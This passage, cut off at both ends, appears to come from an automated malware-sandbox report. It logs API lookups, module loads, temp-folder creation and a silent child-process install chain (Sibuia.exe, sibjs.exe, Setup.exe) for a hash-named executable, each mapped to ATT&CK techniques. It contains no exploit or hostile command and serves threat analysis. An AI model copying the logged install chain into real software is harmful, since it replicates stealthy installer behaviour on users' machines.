\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultUILanguage (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter GetTempPath2W (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter ProcessLogMessage (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004412)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter RtlCompressBuffer (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter RtlGetCompressionWorkSpaceSize (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBuffer (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002688)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RtlCompressBuffer (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RtlGetCompressionWorkSpaceSize (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBuffer (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CorBindToRuntimeEx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CorBindToRuntimeEx_RetAddr (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter DllGetClassObjectInternal (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SysStringByteLen (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CoCreateGuid (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter AddRefActCtx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter ReleaseActCtx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter GetCurrentActCtx (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e196d@ADVAPI32.dll\"\n \"0e000f00703f196d@ADVAPI32.dll\"\n \"0e000f00cc3f196d@ADVAPI32.dll\"\n \"11001200b447196d@ADVAPI32.dll\"\n \"110012004848196d@ADVAPI32.dll\"\n \"120013008c48196d@ADVAPI32.dll\"\n \"12001300e448196d@ADVAPI32.dll\"\n \"14001500f86e196d@ADVAPI32.dll\"\n \"14001500106f196d@ADVAPI32.dll\"\n \"14001500286f196d@ADVAPI32.dll\"\n \"17001800406f196d@ADVAPI32.dll\"\n \"0d000e00586f196d@ADVAPI32.dll\"\n \"11001200686f196d@ADVAPI32.dll\"\n \"110012007c6f196d@ADVAPI32.dll\"\n \"0d000e003449196d@SHELL32.dll\"\n \"0d000e00b049196d@SHELL32.dll\"\n \"0f001000bc70196d@ADVAPI32.dll\"\n \"14001500fc70196d@ADVAPI32.dll\"\n \"140015001471196d@ADVAPI32.dll\"\n \"0c000d005c71196d@ADVAPI32.dll\"\n \"0c000d006c71196d@ADVAPI32.dll\"\n \"0e000f007c71196d@ADVAPI32.dll\"\n \"0e000f008c71196d@ADVAPI32.dll\"\n \"0b000c009c71196d@ADVAPI32.dll\"\n \"14001500d072196d@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\ (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter C:\\Users (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Temp (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\FutureApp (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\FutureApp\\0 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\FutureApp\\1 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\FutureApp\\2 (UID: 00000000-00004412)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateProcessW\" with parameter \"%TEMP%\\FutureApp\\Sibuia.exe TRUE 111 0\" - (UID: 00000000-00004412)\n \"Sibuia.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\FutureApp\\sibjs.exe\" TRUE 000 False cond_pkg\" - (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\FutureApp\\0\\Setup.exe\" -s\" - (UID: 00000000-00002688)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"SibClr.dll\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"Zip.dll\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"039F3.tmp\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetSubKeyNames\" in \"SibClr.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"SibClr.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"SibClr.dll\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71170000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"KERNEL32\" at base 76710000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"ADVAPI32.DLL\" at base 75c90000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74330000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DWMAPI.DLL\" at base 742c0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPTBASE.DLL\" at base 756f0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEACC.DLL\" at base 6bde0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CLBCATQ.DLL\" at base 763d0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTMARTA.DLL\" at base 74c60000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VERSION.DLL\" at base 74c90000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHFOLDER.DLL\" at base 6d3a0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"CRYPTBASE.DLL\" at base 756f0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 745c0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"OLE32.DLL\" at base 75b30000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"KERNEL32.DLL\" at base 76710000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"COMCTL32.DLL\" at base 746c0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"OLEAUT32.DLL\" at base 77aa0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"SETUPAPI.DLL\" at base 76570000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"RPCRT4.DLL\" at base 77590000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"CLBCATQ.DLL\" at base 763d0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"NTMARTA.DLL\" at base 74c60000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76290000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"PROFAPI.DLL\" at base 75810000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%TEMP%\\NSNAAD0.TMP\\SIBLOG.DLL\" at base 6d070000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 756a0000\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2\" at base 0\n \"Sibuia.exe\" loaded module \"RPCRT4.DLL\" at base 77590000\n \"Sibuia.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 745c0000\n \"Sibuia.exe\" loaded module \"OLE32.DLL\" at base 75b30000\n \"Sibuia.exe\" loaded module \"ADVAPI32.DLL\" at base 75c90000\n \"Sibuia.exe\" loaded module \"KERNEL32.DLL\" at base 76710000\n \"Sibuia.exe\" loaded module \"PROFAPI.DLL\" at base 75810000\n \"Sibuia.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2\" at base 0\n \"Sibuia.exe\" loaded module \"CLBCATQ.DLL\" at base 763d0000\n \"Sibuia.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UIAUTOMATIONCORE.DLL\" at base 6ab00000\n \"Sibuia.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 756a0000\n \"Sibuia.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"Sibuia.exe\" loaded module \"OLEAUT32.DLL\" at base 77aa0000\n \"sibjs.exe\" loaded module \"OLE32.DLL\" at base 75b30000\n \"sibjs.exe\" loaded module \"ADVAPI32.DLL\" at base 75c90000\n \"sibjs.exe\" loaded module \"KERNEL32.DLL\" at base 76710000\n \"sibjs.exe\" loaded module \"PROFAPI.DLL\" at base 75810000\n \"sibjs.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2\" at base 0\n \"sibjs.exe\" loaded module \"MSCOREE.DLL\" at base 6cc20000\n \"sibjs.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71170000\n \"sibjs.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sibjs.exe\" loaded module \"KERNEL32\" at base 76710000\n \"sibjs.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6aa70000\n \"sibjs.exe\" loaded module \"SHLWAPI.DLL\" at base 761e0000\n \"sibjs.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"sibjs.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"sibjs.exe\" loaded module \"VERSION.DLL\" at base 74c90000\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 69a30000\n \"sibjs.exe\" loaded module \"USER32.DLL\" at base 75e80000\n \"sibjs.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"sibjs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"sibjs.exe\" loaded module \"PSAPI.DLL\" at base 77a60000\n \"sibjs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCOREE.DLL\" at base 6cc20000\n \"sibjs.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 64450000\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\OLEAUT32.DLL\" at base 0\n \"sibjs.exe\" loaded module \"OLEAUT32.DLL\" at base 77aa0000\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6ce90000\n \"sibjs.exe\" loaded module \"CRYPTSP.DLL\" at base 75200000\n \"sibjs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74f90000\n \"sibjs.exe\" loaded module \"CRYPTBASE.DLL\" at base 756f0000\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLEAUT32.DLL\" at base 0\n \"sibjs.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6cc10000\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6a930000\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\VERSION.DLL\" at base 0\n \"sibjs.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\URLMON.DLL\" at base 0\n \"sibjs.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 758c0000\n \"sibjs.exe\" loaded module \"URLMON.DLL\" at base 77440000\n \"sibjs.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75a50000\n \"sibjs.exe\" loaded module \"SECUR32.DLL\" at base 75520000\n \"sibjs.exe\" loaded module \"SHELL32.DLL\" at base 767f0000\n \"sibjs.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 706b0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004412)\n 